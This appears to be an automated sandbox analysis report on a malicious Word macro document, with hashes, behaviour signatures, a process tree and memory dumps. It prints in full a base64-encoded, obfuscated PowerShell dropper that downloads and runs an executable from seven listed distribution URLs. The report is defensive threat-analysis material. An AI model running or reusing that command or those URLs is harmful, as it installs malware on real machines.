Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22/08/2024, 08:00

General

  • Target

    b6e8733190b6c6ae7e12b5204c80274c_JaffaCakes118.doc

  • Size

    133KB

  • MD5

    b6e8733190b6c6ae7e12b5204c80274c

  • SHA1

    541fb3dd19ad8e264dbfa55c55ef7f8a5b8a7e86

  • SHA256

    77641e6ce42f0cfb1e07679d1910a7c600c2a36aacb8c3839596271c047dc0cc

  • SHA512

    3665de96d3aa14ec6af1ca326578b0732f89c5e195103a4a74d79150c639ca3fdc14f631c9ab98602395f908335f88c8a5f27a50f550926439e5ec47d0c75a6a

  • SSDEEP

    1536:00WRD3bNqfNpu39IId5a6XP3Mg8af2q6KEbelP4OvqTl1ygIdavkHUXeONvl8:MR1qf69xak3Mgx2hbvl8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://digimarketery.com/wp-admin/p/

exe.dropper

http://www.mdmfashionbrand.com/softaculous/E6/

exe.dropper

http://unicusadvisors.com/wp-content/plugins/wp-file-manager--/3/

exe.dropper

http://castilloreservado2.com/wp-content/D/

exe.dropper

https://edwardlongmire.com/w2ei/hI/

exe.dropper

http://mathispros.sctestinglab.com/wp-content/5/

exe.dropper

https://samsportal.org/images/9p/

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b6e8733190b6c6ae7e12b5204c80274c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABVADMAMwBvAGgAXwB3AD0AKAAoACcASQB6AGsAaQAnACsAJwBxACcAKQArACcAZgBtACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAHIAbwBGAGkAbABFAFwASwBQAFYAMQB6ADUAMgBcAEUAUgAwAHYARABuAFkAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAHQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAGAAVQByAGAAaQB0AHkAcABgAFIAbwBUAE8AYABDAG8AbAAiACAAPQAgACgAJwB0ACcAKwAoACcAbABzADEAJwArACcAMgAnACkAKwAnACwAJwArACcAIAB0ACcAKwAoACcAbAAnACsAJwBzADEAMQAsACcAKQArACgAJwAgAHQAbAAnACsAJwBzACcAKQApADsAJABMADYAYgA3AHIAaAB0ACAAPQAgACgAJwBUAG0AJwArACcAawByACcAKwAoACcAOQBzACcAKwAnAHQAJwApACkAOwAkAEQAbQBqAHYAYgB2ADcAPQAoACgAJwBFACcAKwAnAHUAYwAxAHAAJwApACsAJwBlAG0AJwApADsAJABGADcANgBwAGIAYQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGsAVQAnACsAJwBtAEsAJwArACgAJwBwAHYAJwArACcAMQAnACkAKwAnAHoANQAnACsAJwAyACcAKwAoACcAawBVACcAKwAnAG0ARQByADAAJwArACcAdgBkACcAKwAnAG4AeQBrAFUAJwApACsAJwBtACcAKQAtAGMAUgBlAFAATABhAEMARQAgACAAKAAnAGsAVQAnACsAJwBtACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACsAJABMADYAYgA3AHIAaAB0ACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQAVQBqAG8AYQB1AHMAZAA9ACgAJwBEACcAKwAoACcAcwA0ACcAKwAnADIAJwApACsAKAAnAGMAaAAnACsAJwB1ACcAKQApADsAJABaAGEAYQBfAGoAYgBvAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcARQBiAEMAbABJAGUATgB0ADsAJABJAHMAeAAxAGQAcgBhAD0AKAAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAZABpAGcAaQBtAGEAcgAnACkAKwAnAGsAJwArACgAJwBlAHQAZQByACcAKwAnAHkALgBjAG8AbQAnACkAKwAnAC8AJwArACgAJwB3ACcAKwAnAHAALQBhAGQAbQBpAG4AJwApACsAJwAvAHAAJwArACcALwAnACsAJwAqAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAJwB3AHcAJwArACcAdwAuACcAKwAnAG0AZAAnACsAKAAnAG0AZgAnACsAJwBhAHMAaABpAG8AbgAnACkAKwAoACcAYgByACcAKwAnAGEAbgBkAC4AYwBvAG0AJwApACsAKAAnAC8AJwArACcAcwBvAGYAdAAnACkAKwAoACcAYQBjACcAKwAnAHUAJwApACsAJwBsAG8AJwArACgAJwB1AHMAJwArACcALwBFACcAKQArACcANgAnACsAJwAvACcAKwAoACcAKgAnACsAJwBoAHQAdABwACcAKwAnADoALwAvAHUAJwApACsAKAAnAG4AJwArACcAaQBjAHUAcwAnACkAKwAoACcAYQAnACsAJwBkACcAKwAnAHYAaQBzAG8AcgBzACcAKQArACcALgAnACsAKAAnAGMAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAZQBuACcAKQArACgAJwB0AC8AJwArACcAcAAnACkAKwAoACcAbAB1ACcAKwAnAGcAJwApACsAKAAnAGkAJwArACcAbgBzACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQAnACsAJwBmAGkAJwApACsAJwBsACcAKwAnAGUAJwArACgAJwAtAG0AYQBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwByACcAKwAnAC0ALQAnACkAKwAoACcALwAnACsAJwAzAC8AKgAnACkAKwAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAvACcAKwAnAC8AJwApACsAJwBjAGEAJwArACgAJwBzAHQAaQBsAGwAJwArACcAbwByACcAKwAnAGUAcwAnACkAKwAoACcAZQByACcAKwAnAHYAJwApACsAKAAnAGEAZAAnACsAJwBvADIAJwApACsAKAAnAC4AYwAnACsAJwBvAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYwAnACkAKwAoACcAbwAnACsAJwBuAHQAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcARAAvACcAKQArACgAJwAqAGgAJwArACcAdAAnACkAKwAnAHQAcAAnACsAKAAnAHMAOgAnACsAJwAvAC8AZQAnACkAKwAoACcAZAB3AGEAJwArACcAcgAnACkAKwAoACcAZABsACcAKwAnAG8AJwApACsAKAAnAG4AJwArACcAZwBtAGkAcgAnACkAKwAnAGUAJwArACcALgAnACsAKAAnAGMAJwArACcAbwBtACcAKQArACcALwAnACsAKAAnAHcAMgBlACcAKwAnAGkALwBoACcAKwAnAEkAJwApACsAKAAnAC8AJwArACcAKgBoAHQAdAAnACkAKwAnAHAAOgAnACsAJwAvAC8AJwArACgAJwBtACcAKwAnAGEAdAAnACkAKwAnAGgAaQAnACsAJwBzAHAAJwArACcAcgAnACsAKAAnAG8AJwArACcAcwAuAHMAYwB0ACcAKQArACcAZQBzACcAKwAoACcAdABpAG4AJwArACcAZwBsAGEAJwArACcAYgAnACkAKwAoACcALgAnACsAJwBjACcAKwAnAG8AbQAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBjAG8AbgAnACsAJwB0AGUAbgB0AC8ANQAnACsAJwAvACoAaAB0AHQAcABzACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBzAGEAbQAnACkAKwAnAHMAJwArACcAcABvACcAKwAnAHIAJwArACgAJwB0ACcAKwAnAGEAJwArACcAbAAuAG8AcgBnAC8AaQBtACcAKQArACcAYQBnACcAKwAoACcAZQBzACcAKwAnAC8AOQBwAC8AJwApACkALgAiAHMAUABgAEwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARwBvAGoANgAyAGIAawA9ACgAKAAnAFYAaAAnACsAJwBiADcAJwApACsAKAAnAGMAJwArACcAeABiACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAUgBrADcAMQA3AHMAaQAgAGkAbgAgACQASQBzAHgAMQBkAHIAYQApAHsAdAByAHkAewAkAFoAYQBhAF8AagBiAG8ALgAiAEQAbwB3AGAATgBMAGAATwBhAGAAZABmAGkAbABFACIAKAAkAFIAawA3ADEANwBzAGkALAAgACQARgA3ADYAcABiAGEAZgApADsAJABBADYAeQB5AGUAcwA2AD0AKAAnAEcAaQAnACsAKAAnAHEAJwArACcAdQAzAGUAYQAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABGADcANgBwAGIAYQBmACkALgAiAEwARQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADkANwAzADIAKQAgAHsAJgAoACcASQBuAHYAbwBrAGUAJwArACcALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAoACQARgA3ADYAcABiAGEAZgApADsAJABVAHEAYgA3AHIAMQAyAD0AKAAoACcAUQBoAG4AcgBoACcAKwAnADAAJwApACsAJwB0ACcAKQA7AGIAcgBlAGEAawA7ACQARQAyAGgAdAA4AGcAMgA9ACgAJwBRAHcAJwArACcAcwAnACsAKAAnAHcAMQAnACsAJwBfAHoAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANwBrAGcAYQAzAHQAPQAoACgAJwBYAHoAJwArACcAcwAnACkAKwAoACcAbABzACcAKwAnAGcAYgAnACkAKQA=
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2752

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      f400906bff32fb5929b5dcf78cff0afd

      SHA1

      5477c6b8388cce03b706e49ba25cec65c6dcc2a8

      SHA256

      a922db747042d62c70ec00b8a9a7b5df85e5accd958e05532e8fc216e9c65b76

      SHA512

      9c1702c91c78502e4a07c2642eb940c29392d1cf41d58805baad8d90916008145e24e65d8414fe5273b9d4037a87ccbeef4548b685dd7e8c2e61ee24f349a941

    • memory/2500-15-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-21-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-6-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-5-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-11-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-10-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-9-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-8-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-7-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-12-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-13-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-24-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-27-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-39-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-22-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-32-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-20-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-19-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-18-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-17-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-16-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-0-0x000000002F9C1000-0x000000002F9C2000-memory.dmp

      Filesize

      4KB

    • memory/2500-2-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB

    • memory/2500-14-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-23-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-38-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-37-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-36-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-35-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-31-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-30-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-29-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-28-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-47-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-52-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-79-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB

    • memory/2500-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2500-49-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-48-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-57-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB

    • memory/2500-61-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-62-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/2500-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2752-50-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2752-51-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB